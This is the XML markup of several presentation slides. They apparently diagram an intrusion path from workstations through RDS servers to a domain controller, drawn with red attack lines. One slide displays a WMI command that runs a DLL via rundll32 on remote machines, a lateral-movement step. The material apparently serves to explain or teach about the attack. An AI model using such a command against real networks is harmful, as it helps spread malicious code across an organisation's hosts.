                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>RDS</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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B5CD53A3-C228-24BD-634F-88B248394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607916" y="5553702"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5A29C00-3A8D-E6A7-9846-E9418E65E6A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6848475" y="2676525"/>
            <a:ext cx="2576513" cy="2508250"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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0852C354-498D-2EF5-8877-93CAAF0B5D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987994" y="7385041"/>
            <a:ext cx="1459963" cy="1966481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CD4702A6-F00C-D322-3B8F-EA829009EA8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6440972" y="7385042"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="6440972" y="7385042"/>
            <a:chExt cx="1459963" cy="1966481"/>
          </a:xfrm>
        </p:grpSpPr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6C3C5ADA-9E89-7C89-57F1-58DB4F330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440972" y="7385042"/>
              <a:ext cx="1459963" cy="1966481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5E443F95-E348-4380-DD5B-FB7FEBACD2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999429" y="8084811"/>
              <a:ext cx="464482" cy="56694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58F4468-FBAF-6152-DCC2-C4D87A1A7BDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8214483" y="7385041"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="8214483" y="7385041"/>
            <a:chExt cx="1459963" cy="1966481"/>
          </a:xfrm>
        </p:grpSpPr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ED51FB2A-A774-A2F0-0E09-6FD26BB20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8214483" y="7385041"/>
              <a:ext cx="1459963" cy="1966481"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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E577761F-17DE-565A-9CD7-011BFD0B45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8760513" y="8084811"/>
              <a:ext cx="464482" cy="566940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0B70350-6576-045F-1A4D-53304AE7A078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11858362" y="7205476"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="11858362" y="7205476"/>
            <a:chExt cx="1652602" cy="1101734"/>
          </a:xfrm>
        </p:grpSpPr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EE317E50-3F81-A312-A117-5435C98A92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11858362" y="7205476"/>
              <a:ext cx="1652602" cy="1101734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D97867FB-634A-8E52-0A7D-16AB91274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2446684" y="7472873"/>
              <a:ext cx="464482" cy="56694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A77A1DA-577F-9D26-B007-57C8F67E06F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13583252" y="6562543"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="13583252" y="6562543"/>
            <a:chExt cx="1652602" cy="1101734"/>
          </a:xfrm>
        </p:grpSpPr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ABE962DA-D583-670F-16A1-2C335E7C1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13583252" y="6562543"/>
              <a:ext cx="1652602" cy="1101734"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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C8A6FDAB-2257-D5D6-41BC-FADC9CE8F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4177312" y="6829940"/>
              <a:ext cx="464482" cy="5669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41F9C9F-50B5-AB3C-0721-FE5BE2796593}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15055789" y="4694334"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15055789" y="4694334"/>
            <a:chExt cx="1729827" cy="1585675"/>
          </a:xfrm>
        </p:grpSpPr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4ED8D163-D75B-8EBE-D987-18F6B45D6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5055789" y="4694334"/>
              <a:ext cx="1729827" cy="1585675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14D752D2-0C0C-27D8-A6C0-1A90EFB2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5533037" y="5407540"/>
              <a:ext cx="464482" cy="56694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FC6E724-90B3-38E1-9239-4D5747562703}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13286213" y="3199706"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="13286213" y="3199706"/>
            <a:chExt cx="1729827" cy="1585675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="Graphic 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92EE05BB-803D-ACFE-95CE-38361E926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3286213" y="3199706"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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9B6A85D3-C721-EE1B-23C2-A4133A4C8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3778328" y="3922114"/>
              <a:ext cx="464482" cy="56694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48D101B-EB55-8559-C0FE-E5405FB17E60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15421521" y="2099717"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15421521" y="2099717"/>
            <a:chExt cx="1729827" cy="1585675"/>
          </a:xfrm>
        </p:grpSpPr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id="{8E40B84F-908C-CF40-25EC-209734513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5421521" y="2099717"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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443CD030-1093-F7EF-A44A-69C9416CA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5896053" y="2823564"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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id="{72D03DC6-130D-8749-5B2F-8A073AA8AC3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79874" y="7459200"/>
            <a:ext cx="2430121" cy="1886916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C24EA4-88FD-4C3E-88BD-4771DC4A5101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2809995" y="5206520"/>
            <a:ext cx="4003767" cy="3196138"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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phic 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5E16EDE-A15C-883A-CF4A-C5FE0B86BD7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6315183" y="4551633"/>
            <a:ext cx="1049948" cy="1259938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392260" y="0"/>
            <a:ext cx="189574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00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0.14167 -0.243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121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C049B-A647-8AD0-2B3D-B50E0BD6D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EE67F51-BE04-E1F0-3819-24399D1779DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702299" y="1461299"/>
            <a:ext cx="12118307" cy="827646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38F88DA-CD63-50EB-376E-DAB9194C1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267200" y="266700"/>
            <a:ext cx="9753600" cy="97536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C743AA8-3560-B5B9-BBE8-4F681154CB56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8435715" y="1697956"/>
            <a:ext cx="1982799" cy="2710087"/>
            <a:chOff x="4596105" y="4160260"/>
            <a:chExt cx="1982799" cy="2710087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A2BD96A8-EF97-D9A1-CB60-FE87F3F79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4857524" y="4160260"/>
              <a:ext cx="1459963" cy="196648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773D11B-8FC4-92D7-6131-EB54CAAC9DFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4596105" y="6039350"/>
              <a:ext cx="1982799" cy="830997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  <a:t>Domain</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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  <a:t>Controller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C36E4B2-8F05-30E3-D4D3-9F463D6956A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6067249" y="4223963"/>
            <a:ext cx="1459963" cy="2338580"/>
            <a:chOff x="6067249" y="4223963"/>
            <a:chExt cx="1459963" cy="233858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048A780-2B26-F3B2-E48E-187CB154C9C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6067249" y="4223963"/>
              <a:ext cx="1459963" cy="2338580"/>
              <a:chOff x="4857524" y="4160260"/>
              <a:chExt cx="1459963" cy="2338580"/>
            </a:xfrm>
          </p:grpSpPr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28FD70E7-F5EF-2917-3E46-8BC88EFC12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4857524" y="4160260"/>
                <a:ext cx="1459963" cy="1966480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82CEE7E-C38A-A098-29A7-E965713CA4F7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4957545" y="6037175"/>
                <a:ext cx="1259919" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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424D56"/>
                    </a:solidFill>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>RDS</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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48465655-507D-A065-4D55-55F31F8AD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607916" y="5553702"/>
              <a:ext cx="464482" cy="566940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1301F8A-4E63-5206-0332-B7163E4A47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987994" y="7385041"/>
            <a:ext cx="1459963" cy="1966481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20533FD3-631A-B781-3DC2-D0517E223B69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6440972" y="7385042"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="6440972" y="7385042"/>
            <a:chExt cx="1459963" cy="1966481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B09317F8-E758-47C8-3E6F-B9A906248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440972" y="7385042"/>
              <a:ext cx="1459963" cy="1966481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E208778B-E948-A530-C2CF-2CB117A00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999429" y="8084811"/>
              <a:ext cx="464482" cy="5669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5F29098-A301-5924-BCA7-86F17AD359EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8214483" y="7385041"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="8214483" y="7385041"/>
            <a:chExt cx="1459963" cy="1966481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5E42FA3B-81AC-6240-95FF-94E3BA996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8214483" y="7385041"/>
              <a:ext cx="1459963" cy="1966481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3E23C310-2AC9-DC2D-ABF3-DF1211F7A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8760513" y="8084811"/>
              <a:ext cx="464482" cy="5669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453C23A-7DCE-56CE-FC45-55ADD1CF187E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11858362" y="7205476"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="11858362" y="7205476"/>
            <a:chExt cx="1652602" cy="110173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F54AFA71-6457-C4FC-E5EA-09844838B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11858362" y="7205476"/>
              <a:ext cx="1652602" cy="1101734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2211889E-7171-056C-B90E-A4633D430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2446684" y="7472873"/>
              <a:ext cx="464482" cy="5669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C32A5E0-16CF-34AF-F111-52767A20EF94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13583252" y="6562543"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="13583252" y="6562543"/>
            <a:chExt cx="1652602" cy="1101734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1DBD0C0B-9B14-3AB7-67B2-0B63B7544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13583252" y="6562543"/>
              <a:ext cx="1652602" cy="1101734"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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9A1DEF09-4BAA-8394-24C8-FD97E3D80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4177312" y="6829940"/>
              <a:ext cx="464482" cy="5669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8734C11-4CC3-3A92-BB8B-A76F2954F84F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15055789" y="4694334"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15055789" y="4694334"/>
            <a:chExt cx="1729827" cy="1585675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C6B94B4C-9A43-702C-5D2D-8C913BFC4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5055789" y="4694334"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5DFBF5E5-B5E0-4601-813B-75685BD3E6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5533037" y="5407540"/>
              <a:ext cx="464482" cy="56694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B6728-A8FB-408D-2EE5-019271FAF86C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15421521" y="2099717"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15421521" y="2099717"/>
            <a:chExt cx="1729827" cy="1585675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3925962D-7AFD-8460-1903-453DEBAB4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5421521" y="2099717"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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3869E6DE-FCF8-F498-C401-D2BACF8C5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5896053" y="2823564"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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8C5A02C-DE5D-35B7-D642-7FC69A6C0533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6848475" y="2676525"/>
            <a:ext cx="2576513" cy="2508250"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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C8BBF14-22F9-0F32-B005-B6B520339C23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13286213" y="3199706"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="13286213" y="3199706"/>
            <a:chExt cx="1729827" cy="1585675"/>
          </a:xfrm>
        </p:grpSpPr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BB82052D-38F2-9587-CCCE-2A786B3E7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3286213" y="3199706"/>
              <a:ext cx="1729827" cy="1585675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041FEF0C-A020-D1DA-DBE0-EB925A1A02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3778328" y="3922114"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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C52E3C25-9556-A7CA-1A00-DD4C8FC3C306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2016600" y="1149179"/>
            <a:ext cx="14833600" cy="636529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88900">
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha val="66000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="584200">
              <a:schemeClr val="tx2">
                <a:alpha val="73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glow rad="190500">
                    <a:schemeClr val="tx2">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WMI:&gt; %WINDIR%\syswow64\rundll32.exe c:\windows\COMPANY_c.dll,VisibleEntry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D843143-E1A6-3E30-E207-25973733511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900014" y="2046556"/>
            <a:ext cx="1049948" cy="1259938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12FE550-708E-D7E3-1216-44F8456AC8B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379874" y="7459200"/>
            <a:ext cx="2430121" cy="1886916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7176344-44C5-5B20-726E-D09F225AA468}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="3" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2809995" y="5206520"/>
            <a:ext cx="4003767" cy="3196138"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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Kép 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392260" y="0"/>
            <a:ext cx="189574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64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3B0FC-2CAD-2117-25F5-578F34C2D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8ED3BF2-8BCA-24D5-61C5-5E6A3B7FC7F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702299" y="1461299"/>
            <a:ext cx="12118307" cy="827646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2DBE34E-9EFD-1719-92C5-AD028BD076A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8435715" y="1697956"/>
            <a:ext cx="1982799" cy="2710087"/>
            <a:chOff x="4596105" y="4160260"/>
            <a:chExt cx="1982799" cy="2710087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41BDADD8-A64B-CED8-B9E1-541364C26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4857524" y="4160260"/>
              <a:ext cx="1459963" cy="196648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5318A2-0F08-FC76-23B6-215F825DB6C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4596105" y="6039350"/>
              <a:ext cx="1982799" cy="830997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  <a:t>Domain</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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  <a:t>Controller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101AEF5A-A2C2-45F6-851B-9533475EAC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267200" y="266700"/>
            <a:ext cx="9753600" cy="97536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42C141C0-F511-F7D4-C26B-8A3C368799E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6067249" y="4223963"/>
            <a:ext cx="1459963" cy="2338580"/>
            <a:chOff x="6067249" y="4223963"/>
            <a:chExt cx="1459963" cy="233858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5E33F38-708D-A2CF-E34C-83CCA38A72A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6067249" y="4223963"/>
              <a:ext cx="1459963" cy="2338580"/>
              <a:chOff x="4857524" y="4160260"/>
              <a:chExt cx="1459963" cy="2338580"/>
            </a:xfrm>
          </p:grpSpPr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7C009F16-6CCE-57D9-3A1C-CD8460E1B0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4857524" y="4160260"/>
                <a:ext cx="1459963" cy="1966480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394D3C-2B4E-644B-04FD-CBF21ECC1EBA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4957545" y="6037175"/>
                <a:ext cx="1259919" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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424D56"/>
                    </a:solidFill>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>RDS</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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D2A450EF-E134-901C-92B9-F389FAF86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6607916" y="5553702"/>
              <a:ext cx="464482" cy="566940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61B55755-A530-A33F-46A4-BB7C30F0DF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9987994" y="7385041"/>
            <a:ext cx="1459963" cy="1966481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D5F619DA-58F0-00B1-A966-201FC137FFEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6440972" y="7385042"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="6440972" y="7385042"/>
            <a:chExt cx="1459963" cy="1966481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0635434B-7AAF-3DBB-0246-2D4636C0F08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6440972" y="7385042"/>
              <a:ext cx="1459963" cy="1966481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63675F2D-8CE8-F894-290C-F97B0EC0C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6999429" y="8084811"/>
              <a:ext cx="464482" cy="5669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D6724A0-ECED-827D-2602-D0FF8A7D71F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8214483" y="7385041"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="8214483" y="7385041"/>
            <a:chExt cx="1459963" cy="1966481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753984B5-8FD7-A6BC-DE9A-03916BB4F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8214483" y="7385041"/>
              <a:ext cx="1459963" cy="1966481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E463D065-A981-A5C7-CD4D-637A9AC3E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8760513" y="8084811"/>
              <a:ext cx="464482" cy="5669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6FC23D1-B855-679D-FF4B-A5C70F4D0056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11858362" y="7205476"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="11858362" y="7205476"/>
            <a:chExt cx="1652602" cy="110173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AB8C4CAC-8DB6-4B4C-3CEB-098CEF2F5D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1858362" y="7205476"/>
              <a:ext cx="1652602" cy="1101734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F9827F0F-8CB1-BFA3-BD21-66EFEA80F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12446684" y="7472873"/>
              <a:ext cx="464482" cy="5669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05DEF76-7250-A79F-9F1F-0F38453555B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13583252" y="6562543"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="13583252" y="6562543"/>
            <a:chExt cx="1652602" cy="1101734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5C05BACF-1F2E-BE52-DFDA-20AFEC4E1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3583252" y="6562543"/>
              <a:ext cx="1652602" cy="1101734"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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106BCBE4-25E3-FD07-64F4-B9B26DD4C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14177312" y="6829940"/>
              <a:ext cx="464482" cy="5669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8CCABE7-6A9D-E9E6-AC0D-25C57866F6E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15055789" y="4694334"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15055789" y="4694334"/>
            <a:chExt cx="1729827" cy="1585675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BAAD5811-5617-E413-1915-254F8BF19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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="15055789" y="4694334"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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7585E0F3-D313-C420-5268-51D62BB21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15533037" y="5407540"/>
              <a:ext cx="464482" cy="56694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7052C59-EC05-A299-D158-75C830C6970F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15421521" y="2099717"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15421521" y="2099717"/>
            <a:chExt cx="1729827" cy="1585675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AD9E988E-A085-D5AD-E7F0-F1446BF7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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="15421521" y="2099717"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5761BDBC-3FC9-84CF-1D49-803944085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15896053" y="2823564"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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1724337-2453-CAD1-E0C0-D4D3A3EDC504}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7228910" y="2676525"/>
            <a:ext cx="2214045" cy="5630685"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="2032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63FA1FD-EFD8-28D0-5278-7E30B5FE8CB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6848475" y="2676525"/>
            <a:ext cx="2576513" cy="2508250"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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A600B2C-F1BD-7D2D-09A1-7B0EDDDA7208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8989648" y="2676525"/>
            <a:ext cx="448339" cy="5630685"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="2032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BFEC3533-F829-1F0C-4453-F9013BF2C741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9433400" y="2676525"/>
            <a:ext cx="1291727" cy="5630685"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
